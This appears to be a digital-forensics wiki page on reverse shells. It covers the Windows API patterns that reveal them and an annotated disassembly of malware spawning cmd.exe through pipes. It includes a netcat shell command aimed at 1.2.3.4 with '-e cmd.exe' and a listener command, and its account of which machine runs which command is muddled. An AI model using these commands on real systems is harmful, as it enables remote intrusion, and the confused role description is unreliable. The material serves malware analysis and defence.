Category:Digital-Forensics/Backdoors/Reverse-Shell
Jump to navigation
Jump to search
| You are here | Reverse Shell
|
Reverse shell
A reverse shell is a shell initiated by the infected machine and that offers a remote access to the attacker. Netcat/Socat can be used for such purposes:
- Infected machine: the below command opens a socket and waits for remote connections:
C:\> nc -l -p 80
- Connection: the attacker connects to the infected machine:
C:\> nc 1.2.3.4 80 -e cmd.exe
Windows Reverse Shell
Malware can implement a Windows reverse shell by invoking the cmd.exe command with CreateProcess. The presence of CreateThread and CreatePipe could indicate a multithreaded Windows remote shell.
Basic
- Call to CreateProcess and manipulation of the STARTUPINFO structure passed to the CreateProcess function.
- Socket created and connection to remote server established
- Socket tied to the standard streams (stdin, stdout, stderr) for cmd.exe
- CreateProcess starts cmd.exe with window hidden
Multithreaded
- Creation of a socket + 2 pipes (CreatePipe) + 2 threads (CreateThread will create 1 thread for reading from stdin pipe, and 1 other for writing to stdout pipe)
- CreatePipe used to tie red/write ends to a pipes
- CreateProcess used to tie standard streams to pipes instead of directly to the sockets
Example
.text:00401262 mov esi, ds:CreatePipe
.text:00401268 lea ecx, [esp+1ACh+PipeAttributes]
.text:0040126C push ecx ; lpPipeAttributes
.text:0040126D push edx ; hWritePipe
.text:0040126E push ebx ; hReadPipe
.text:0040126F call esi ; CreatePipe
.text:00401271 lea ecx, [esp+1A8h+PipeAttributes]
.text:00401275 lea eax, [ebx+4]
.text:00401278 push ebp ; nSize
.text:00401279 push ecx ; lpPipeAttributes
.text:0040127A lea edx, [esp+1B0h+hReadPipe]
.text:0040127E push eax ; hWritePipe
.text:0040127F push edx ; hReadPipe
.text:00401280 call esi ; CreatePipe
.text:00401282 mov [esp+1A8h+StartupInfo.cb], 44h
.text:0040128A mov [esp+1A8h+StartupInfo.lpReserved], ebp
.text:0040128E mov eax, [esp+1A8h+hWritePipe]
.text:00401292 mov [esp+1A8h+StartupInfo.lpTitle], ebp
.text:00401296 mov [esp+1A8h+StartupInfo.lpDesktop], ebp
.text:0040129A mov [esp+1A8h+StartupInfo.dwYSize], ebp
.text:0040129E mov [esp+1A8h+StartupInfo.dwXSize], ebp
.text:004012A2 mov [esp+1A8h+StartupInfo.dwY], ebp
.text:004012A6 mov [esp+1A8h+StartupInfo.dwX], ebp
.text:004012AA mov [esp+1A8h+StartupInfo.wShowWindow], bp
.text:004012AF mov [esp+1A8h+StartupInfo.lpReserved2], ebp
.text:004012B3 mov [esp+1A8h+StartupInfo.cbReserved2], bp
.text:004012B8 mov [esp+1A8h+StartupInfo.dwFlags], 101h
.text:004012C0 mov [esp+1A8h+StartupInfo.hStdError], eax
.text:004012C7 mov [esp+1A8h+StartupInfo.hStdOutput], eax
.text:004012CE mov eax, [esp+1A8h+hReadPipe]
.text:004012D2 mov esi, ds:GetCurrentProcess
.text:004012D8 push ebp ; dwOptions
.text:004012D9 push 1 ; bInheritHandle
.text:004012DB lea ecx, [esp+1B0h+StartupInfo.hStdError]
.text:004012E2 push 2 ; dwDesiredAccess
.text:004012E4 push ecx ; lpTargetHandle
.text:004012E5 mov [esp+1B8h+StartupInfo.hStdInput], eax
.text:004012EC call esi ; GetCurrentProcess
.text:004012EE mov edx, [esp+1B8h+hWritePipe]
.text:004012F2 push eax ; hTargetProcessHandle
.text:004012F3 push edx ; hSourceHandle
.text:004012F4 call esi ; GetCurrentProcess
.text:004012F6 push eax ; hSourceProcessHandle
.text:004012F7 call ds:DuplicateHandle
.text:004012FD mov edi, offset aCmd_exe ; "cmd.exe"
.text:00401302 or ecx, 0FFFFFFFFh
.text:00401305 xor eax, eax
.text:00401307 lea edx, [esp+1A8h+CommandLine]
.text:0040130E repne scasb
.text:00401310 not ecx
.text:00401312 sub edi, ecx
.text:00401314 mov eax, ecx
.text:00401316 mov esi, edi
.text:00401318 mov edi, edx
.text:0040131A lea edx, [esp+1A8h+StartupInfo]
.text:0040131E shr ecx, 2
.text:00401321 rep movsd
.text:00401323 mov ecx, eax
.text:00401325 lea eax, [esp+1A8h+CommandLine]
.text:0040132C and ecx, 3
.text:0040132F rep movsb
.text:00401331 lea ecx, [esp+1A8h+ProcessInformation]
.text:00401338 push ecx ; lpProcessInformation
.text:00401339 push edx ; lpStartupInfo
.text:0040133A push ebp ; lpCurrentDirectory
.text:0040133B push ebp ; lpEnvironment
.text:0040133C push ebp ; dwCreationFlags
.text:0040133D push 1 ; bInheritHandles
.text:0040133F push ebp ; lpThreadAttributes
.text:00401340 push ebp ; lpProcessAttributes
.text:00401341 push eax ; lpCommandLine
.text:00401342 push ebp ; lpApplicationName
.text:00401343 call ds:CreateProcessA
Pages in category "Digital-Forensics/Backdoors/Reverse-Shell"
The following 5 pages are in this category, out of 5 total.